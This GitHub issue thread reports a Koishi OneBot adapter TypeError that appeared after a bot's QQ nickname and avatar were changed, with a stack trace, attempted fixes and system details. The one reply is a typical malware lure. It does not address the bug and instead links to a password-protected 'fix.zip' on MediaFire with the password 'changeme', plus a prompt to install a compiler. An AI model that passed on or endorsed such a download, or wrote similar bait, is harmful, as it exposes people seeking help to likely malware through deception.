### ISSUE TITLE
更新bot QQ昵称和头像后出现app TypeError: Cannot read properties of undefined (reading 'type')

### ISSUE THREAD

**Issue by SCM716** [koishijs/koishi-plugin-adapter-onebot#53]
如题，电脑端更新bot 昵称和头像后koishi控制台bot退出登录，并且adapter-onebot和adapter-qq均报错。
![914A0DB2534E895DF50AB69A8EF333B6](https://github.com/user-attachments/assets/5563adb1-b44f-466a-b913-56c4c9ee07a4)

### 日志信息：

`2024-09-28 21:17:43 [E] app TypeError: Cannot read properties of undefined (reading 'type')
                            at Object.get (C:\Users\Ramiya\AppData\Roaming\Koishi\Desktop\data\instances\default\node_modules\@cordisjs\core\lib\index.cjs:198:)
                           at Reflect.get (<anonymous>)
                           at Object.get (C:\Users\Ramiya\AppData\Roaming\Koishi\Desktop\data\instances\default\node_modules\@cordisjs\core\lib\index.cjs:1:22)
                            at Reflect.get (<anonymous>)
                            at Object.getRecursive [as $] (C:\Users\Ramiya\AppData\Roaming\Koishi\Desktop\data\instances\default\node_modules\minato\lib\index.cjs:586:12)
                            at getRecursive (C:\Users\Ramiya\AppData\Roaming\Koishi\Desktop\data\instances\default\node_modules\minato\lib\index.cjs:591:)
                            at executeEval (C:\Users\Ramiya\AppData\Roaming\Koishi\Desktop\data\instances\default\node_modules\minato\lib\index.cjs:625:10)
                            at executeEvalExpr (C:\Users\Ramiya\AppData\Roaming\Koishi\Desktop\data\instances\default\node_modules\minato\lib\index.cjs:605:28)
                           at operators.<computed> [as $eq] (C:\Users\Ramiya\AppData\Roaming\Koishi\Desktop\data\instances\default\node_modules\minato\lib\index.cjs:468:18)`

### 目前尝试：

1. 重装NT QQ，LiteLoader,llonebot
2. 清除onebot依赖
3. 清除channel数据库中的assignee数据
4. 按时间倒序删除最近安装的插件

后问题仍未解决。

### 系统信息：
System:
  OS: Windows 11 10.0.22631CPU: (4) x64 Intel(R) N100
Binaries:
  Node: 20.12.2
  Yarn: 4.1.1
Koishi:
  Core: 4.18.0
  Console: 5.28.4
  Koishi Desktop: 1.1.3

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)
